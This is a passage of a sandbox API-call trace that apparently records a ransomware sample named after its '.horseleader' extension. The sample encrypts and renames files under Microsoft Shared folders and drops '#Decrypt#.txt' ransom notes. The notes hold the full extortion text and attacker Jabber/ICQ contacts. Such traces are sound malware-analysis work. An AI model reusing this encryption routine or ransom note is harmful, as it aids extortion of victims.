lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0225.990] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0225.990] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0225.990] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x260b7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0225.990] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0225.991] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0225.991] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0225.991] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0225.992] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0225.992] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0225.992] CloseHandle (hObject=0x158) returned 1 [0225.992] GetProcessHeap () returned 0x780000 [0225.992] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0225.992] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.HLP.horseleader") returned 84 [0225.992] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.HLP" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.hlp"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.HLP.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.hlp.horseleader")) returned 1 [0225.994] GetProcessHeap () returned 0x780000 [0225.994] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0225.994] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95fd7600, ftCreationTime.dwHighDateTime=0x1bc9dc7, ftLastAccessTime.dwLowDateTime=0xeef015d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x95fd7600, ftLastWriteTime.dwHighDateTime=0x1bc9dc7, nFileSizeHigh=0x0, nFileSizeLow=0x1de8, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="MTEXTRA.TTF", cAlternateFileName="")) returned 1 [0225.994] lstrcmpiW (lpString1="MTEXTRA.TTF", lpString2="Windows") returned -1 [0225.994] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF") returned 71 [0225.994] StrStrIW (lpFirst="MTEXTRA.TTF", lpSrch=".horseleader") returned 0x0 [0225.994] lstrcmpW (lpString1="MTEXTRA.TTF", lpString2="#Decrypt#.txt") returned 1 [0225.994] lstrcmpW (lpString1="MTEXTRA.TTF", lpString2="_uninstalling_.png") returned 1 [0225.994] lstrlenW (lpString=".testttjffg") returned 11 [0225.994] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF", lpSrch=".testttjffg") returned 0x0 [0225.994] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0225.994] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0225.995] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\mtextra.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0225.995] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF") returned 71 [0225.995] StrStrW (lpFirst="MTEXTRA.TTF", lpSrch=".txt") returned 0x0 [0225.995] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=7656) returned 1 [0225.996] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x1de8, lpOverlapped=0x0) returned 1 [0225.998] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffe218, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0225.998] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x1de8, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x1de8, lpOverlapped=0x0) returned 1 [0225.998] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0225.998] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0225.998] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0225.999] CloseHandle (hObject=0x158) returned 1 [0225.999] GetProcessHeap () returned 0x780000 [0225.999] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0225.999] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF.horseleader") returned 83 [0225.999] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\mtextra.ttf"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\mtextra.ttf.horseleader")) returned 1 [0226.000] GetProcessHeap () returned 0x780000 [0226.000] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0226.000] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95fd7600, ftCreationTime.dwHighDateTime=0x1bc9dc7, ftLastAccessTime.dwLowDateTime=0xeef015d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x95fd7600, ftLastWriteTime.dwHighDateTime=0x1bc9dc7, nFileSizeHigh=0x0, nFileSizeLow=0x1de8, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="MTEXTRA.TTF", cAlternateFileName="")) returned 0 [0226.000] FindClose (in: hFindFile=0x7c6860 | out: hFindFile=0x7c6860) returned 1 [0226.000] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\#Decrypt#.txt") returned 73 [0226.000] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0226.001] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0226.001] WriteFile (in: hFile=0x21c, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aee10*=0x5e4, lpOverlapped=0x0) returned 1 [0226.002] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0226.002] WriteFile (in: hFile=0x21c, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aee10*=0x558, lpOverlapped=0x0) returned 1 [0226.003] CloseHandle (hObject=0x21c) returned 1 [0226.003] GetProcessHeap () returned 0x780000 [0226.003] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0226.003] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x58c7d970, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x58c7d970, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x58c7d970, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="EURO", cAlternateFileName="")) returned 1 [0226.003] lstrcmpiW (lpString1="EURO", lpString2="Windows") returned -1 [0226.003] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EURO") returned 55 [0226.003] lstrcmpW (lpString1="EURO", lpString2=".") returned 1 [0226.003] lstrcmpW (lpString1="EURO", lpString2="..") returned 1 [0226.003] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EURO", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0226.003] GetProcessHeap () returned 0x780000 [0226.003] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0226.003] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\*") returned 57 [0226.003] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\*", lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x58c7d970, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x58c7d970, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x58c7d970, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName=".", cAlternateFileName="")) returned 0x7c6860 [0226.050] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0226.050] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\.") returned 57 [0226.050] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0226.050] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x58c7d970, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x58c7d970, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x58c7d970, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="..", cAlternateFileName="")) returned 1 [0226.050] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0226.051] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\..") returned 58 [0226.051] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0226.051] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0226.051] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6b4ffc00, ftCreationTime.dwHighDateTime=0x1cac1f6, ftLastAccessTime.dwLowDateTime=0x58c7d970, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6b4ffc00, ftLastWriteTime.dwHighDateTime=0x1cac1f6, nFileSizeHigh=0x0, nFileSizeLow=0x7980, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="MSOEURO.DLL", cAlternateFileName="")) returned 1 [0226.051] lstrcmpiW (lpString1="MSOEURO.DLL", lpString2="Windows") returned -1 [0226.051] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL") returned 67 [0226.051] StrStrIW (lpFirst="MSOEURO.DLL", lpSrch=".horseleader") returned 0x0 [0226.051] lstrcmpW (lpString1="MSOEURO.DLL", lpString2="#Decrypt#.txt") returned 1 [0226.051] lstrcmpW (lpString1="MSOEURO.DLL", lpString2="_uninstalling_.png") returned 1 [0226.051] lstrlenW (lpString=".testttjffg") returned 11 [0226.051] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL", lpSrch=".testttjffg") returned 0x0 [0226.051] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0226.051] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0226.051] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\euro\\msoeuro.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0226.052] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL") returned 67 [0226.052] StrStrW (lpFirst="MSOEURO.DLL", lpSrch=".txt") returned 0x0 [0226.052] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=31104) returned 1 [0226.052] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0226.055] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0226.055] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0226.055] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x2980, lpOverlapped=0x0) returned 1 [0226.056] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffd680, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0226.056] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x2980, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x2980, lpOverlapped=0x0) returned 1 [0226.056] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0226.056] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0226.056] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0226.056] CloseHandle (hObject=0x158) returned 1 [0226.056] GetProcessHeap () returned 0x780000 [0226.056] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0226.057] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL.horseleader") returned 79 [0226.057] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\euro\\msoeuro.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\euro\\msoeuro.dll.horseleader")) returned 1 [0226.057] GetProcessHeap () returned 0x780000 [0226.057] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0226.057] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6b4ffc00, ftCreationTime.dwHighDateTime=0x1cac1f6, ftLastAccessTime.dwLowDateTime=0x58c7d970, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6b4ffc00, ftLastWriteTime.dwHighDateTime=0x1cac1f6, nFileSizeHigh=0x0, nFileSizeLow=0x7980, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="MSOEURO.DLL", cAlternateFileName="")) returned 0 [0226.058] FindClose (in: hFindFile=0x7c6860 | out: hFindFile=0x7c6860) returned 1 [0226.058] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\#Decrypt#.txt") returned 69 [0226.058] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\euro\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0226.058] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0226.058] WriteFile (in: hFile=0x21c, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aee10*=0x5e4, lpOverlapped=0x0) returned 1 [0226.059] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqM